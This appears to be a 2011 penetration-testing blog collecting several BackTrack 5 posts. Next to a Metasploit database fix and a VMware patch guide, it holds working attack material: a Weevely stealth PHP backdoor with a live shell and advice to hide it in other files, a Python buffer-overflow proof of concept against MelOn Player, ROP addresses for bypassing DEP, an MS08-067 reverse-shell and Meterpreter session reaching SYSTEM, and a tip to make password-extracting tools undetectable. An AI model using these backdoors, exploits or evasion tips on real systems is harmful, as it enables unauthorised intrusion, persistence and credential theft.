MSF PostgresQL Problem on BT5

If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information.

[-] Failed to connect to the database:
could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 7175?

Seems that the MSF could not connect to Postgres database server. I tried to install the Postgres server inside my BT5 and still have no luck. So I starting to search over the internet and found the solution for this problem. Here are the solution.

rm /opt/framework3/postgresql/data/postmaster.pid
rm /opt/framework3/postgresql/.s.PGSQL.7175
rm /opt/framework3/postgresql/.s.PGSQL.7175.lock
/etc/init.d/framework-postgres start

Then, try to run the msfconsole again.

NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial column "cred_files.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey" for table "cred_files"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"

______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
\                                  /                      /
\     .                          /                      /            x
\                              /                      /
\                            /          +           /
\            +             /                      /
*                        /                      /
/      .               /
X                             /                      /            X
/                     ###
/                     # % #
/                       ###
.       /
.                       /      .            *           .
/
*
+                       *

^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > quit

It will create the databases structure. Again run the msfconsole once again to make sure that it connect to the database correctly

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf >

Nice! Good luck to you.

Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):

root@bt:~# >cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
root@bt:/pentest/backdoors/web/weevely#

Where:
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.

Now take a look what will it be when i put the script and accessed it.

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative 🙂

Mel0nPlayer 1.0.11.x Denial of Service POC

Software Description

Mel0n Player is a famous software in Indonesia to play music that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your local computer or by online streaming to the portal Melon. The songs can also be downloaded to your local computer.

Vulnerable Information

The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file as part of skin template. This file will bring the program information and can be accessed on the menu (Menu → Information)), as a result of adding extra bytes to parts of the file (Text section), giving the attackers possibility to run an arbitrary code execution on the system that install Melon Player.

This is just the POC, it will just crash the program..

How to reproduce the vulnerability

Just run this code, open MelonPlayer –> Go to Menu –> Information –> Boom!

#!/usr/bin/python

import os,sys,shutil,time

header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=

[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34

[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10

[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13

[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20

[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=

[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")

footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0

[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")

filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:Program FilesMelonPlayerIDSkin"

junk = "A" * 3000

buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170rn""")

banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy
=====================================================
""")

file=open(filename,'w')
if os.name == 'nt':
	if os.path.isdir(skindir):
		try:
			file.write(header+buggy+footer)
			print banner
			print "[*] Creating the malicious .ini file.."
			time.sleep(2)
			print "[*] Malicious file (POC)",filename,"created.."
			print "[*] Path:",splash
			file.close()
			shutil.copy2(splash,skindir)
			print "[*] File",filename,"has been copied to",skindir
		except IOError:
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find Skin directory, is MelOn Player installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()

Working exploit can be found here:
https://github.com/modpr0be/exploit-dev/tree/master/exploit-repo/melonplayer

Useful Addresses When Dealing with ROP

Saya nulis ini supaya ga lupa. Sebenarnya bisa dicari lagi sih alamat ini, cuma lebih enak klo udah ada disini tanpa nyari lagi khan?!.

Sejumlah alamat yang dipake untuk tehnik ROP, sbb:

VirtualAlloc()

Secara sederhana, fungsi VirtualAlloc() akan mengalokasikan memory baru. Salah satu dari parameter di fungsi ini yang bisa membuat memory yang baru bisa memiliki opsi eksekusi dan baca-tulis. Untuk itu, tujuan utama di fungsi ini adalah memastikan nilai EXECUTE_READWRITE sesuai.

Pada Windows XP SP3, VirtualAlloc() ada di alamat 0x7C809AF1 (kernel32.dll), sedangkan di Windows 7, terdapat pada alamat 0x75C57A4F (kernel32.dll).

Info: http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspx

HeapCreate()

Membuat memory heap baru yang dapat digunakan oleh shellcode kita. Fungsi ini mengalokasikan sebuah ruang pada ruang virtual address (virtual address space) dari proses yang bersangkutan.

Fungsi ini, hanya akan membuat heap privat dan menandainya sebagai executable. Kita masih harus mengalokasikan memori di heap ini (dengan HeapAlloc() misalnya) dan kemudian meng-copy menyalin shellcode ke lokasi heap (dengan memcpy() misalnya).

Ketika heap memori baru dialokasikan, kita bisa pake memcpy() untuk menyalin shellcode kita ke tempat heap dialokasikan dan jalankan.

Pada XP SP3, HeapCreate terletak di 0x7C812C56 yang juga bagian dari kernel32.dll. Pada Windows 7, HeapCreate terletak di 0x75C5EDFF, bagian dari KERNELBASE.dll

Info: http://msdn.microsoft.com/en-us/library/aa366599(VS.85).aspx

SetProcessDEPPolicy()

Syarat agar fungsi ini berjalan dengan baik, maka DEP harus di set OptIn atau OptOut, jika yang terjadi adalah AlwaysOn atau AlwaysOff, tehnik ini akan jadi error atau ga jalan. Jika modul di linked dengan /NXCOMPAT, tehnik ini juga akan gagal. Begitu juga, tehnik ini hanya bisa dipakai apabila fungsi ini belum dipakai sebelumnya, misalnya IE8 pasti memanggil fungsi ini ketika aplikasi dijalankan, maka tehnik ini tidak bisa dipakai.

Kabar baiknya, fungsi ini hanya perlu 1 parameter, sehingga membuat ROP chain tidak terlalu sulit. Alamat SetProcessDEPPolicy pada Windows XP SP3 0x7C8622A4, sedangkan pada Windows 7 0x762B62E4, keduanya merupakan bagian dari kernel32.dll.

Info: http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspx

NtSetInformationProcess()

Fungsi ini akan membuat memory menjadi executable, tapi tidak akan berjalan jika DEP di set permanen dan AlwaysOn. Alamat pada Windows XP SP3 pada 0x7C90DC9E. Hanya bisa dipake di Windows XP, Vista, dan 2003.

Info:http://uninformed.org/index.cgi?v=2&a=4

VirtualProtect()

Fungsi VirtualProtect merubah perlindungan akses memori saat proses dipanggil. Perlindungan terhadap akses memori bisa dilihat disini. Pada Windows XP SP3 alamatnya adalah 0x7C801AD4, sedangkan pada Windows 7, bisa ditemukan di 0x75C5F306. Keduanya merupakan bagian dari kernel32.dll

WriteProcessMemory()

Pada Windows XP SP3, WriteProcessMemory() terletak di 0x7C802213 (kernel32.dll), dan pada Windows 7 terletak di 0x75C744CF (kernelbase.dll) . Fungsi ini memungkinkan attacker untuk menyalin shellcode ke lokasi lain (executable) sehingga kita bisa melompat pindah ke sana dan menjalankannya. Selama menyalin, fungsi ini memastikan lokasi tujuan ditandai sebagai writeable (bisa ditulis).

Info: http://packetstormsecurity.org/files/view/87883/Windows-DEP-WPM.txt

(Source: corelan.be)

Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1

[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

nice feature, good job Metasploit team 😉

Some Documents of File Specifications/Formats

Here are some documents to help you understand some file formats/headers, for file format fuzzing purpose:

WAVE PCM soundfile format (RIFF)
https://ccrma.stanford.edu/courses/422/projects/WaveFormat/

ZIP File format specification
http://www.pkware.com/documents/casestudies/APPNOTE.TXT

MPEG File format
http://www.mpgedit.org/mpgedit/mpeg_format/mpeghdr.htm#MPEGTAG

GZip File format
http://www.gzip.org/zlib/rfc-gzip.html

SWF File format
http://the-labs.com/MacromediaFlash/SWF-Spec/SWFfileformat.html

TIFF File format
http://www.awaresystems.be/imaging/tiff/faq.html

EXIF File format
http://www.media.mit.edu/pia/Research/deepview/exif.html

ID3Tag File format (v.2.3.0)
http://www.id3.org/id3v2.3.0

PNG File format (v1.2)
http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html

PDF File format
http://www.printmyfolders.com/understanding-pdf

PLS/M3U File format
http://forums.winamp.com/showthread.php?threadid=65772
http://www.assistanttools.com/articles/pls_playlist_format.shtml (PLS)
http://www.assistanttools.com/articles/m3u_playlist_format.shtml (M3U)

RAR File format
http://www.win-rar.com/index.php?id=24&kb_article_id=162

(to be updated…)

Backtrack 5: How to install VMware Workstation 7.1.3

So I want to install VMware Workstation 7.1.3 on Backtrack 5, but there are some things to do there’re errors after I ran the binary (e.g: ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle), so here’s the solution:

Prepare the Kernel

Look here: http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40276-backtrack-5-how-prepare-kernel-sources-vmare-tools-drivers-etc.html

Download patch

http://communities.vmware.com/servlet/JiveServlet/download/2344-293321-1721368-58749/vmware-7.1.3-2.6.38-1-generic.patch

Patching

cd /usr/lib/vmware/modules/source
ls *.tar | xargs -n 1 tar xvf
patch -p1 < /path/to/patch/vmware-7.1.3-2.6.38-1-generic.patch
tar cf vmci.tar vmci-only
tar cf vsock.tar vsock-only
tar cf vmnet.tar vmnet-only
tar cf vmmon.tar vmmon-only
rm -rf vmci-only vsock-only vmnet-only vmmon-only

Compile Module

vmware-modconfig --console --install-all

Voila! VMware Workstation 7.1.3 installed, and you can proceed to upgrade to the latest version. This patch applied only for VMware Workstation 7.1.3, for VMware Workstation 7.1.4 download this patch and you can do the same way.

 

Dump Windows System Info

When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history, etc..probably you wanted to see these tools:

System Information Collector

SAM/Password Extractor

Note:If you familiar with reverse engineering, make those HackTool/PUA undetectable is the best choice 😀

or

Using Metasploit and attack your target system. Meterpreter payload contains lot of user scripts that can be useful to dig system info. I suggest the attack against Internet Explorer since it may not harm the system/service running.

J. Dravet wrote various techniques in order to retrieve the passwords, and of course it depends on your goal, use it wisely.

Good luck 🙂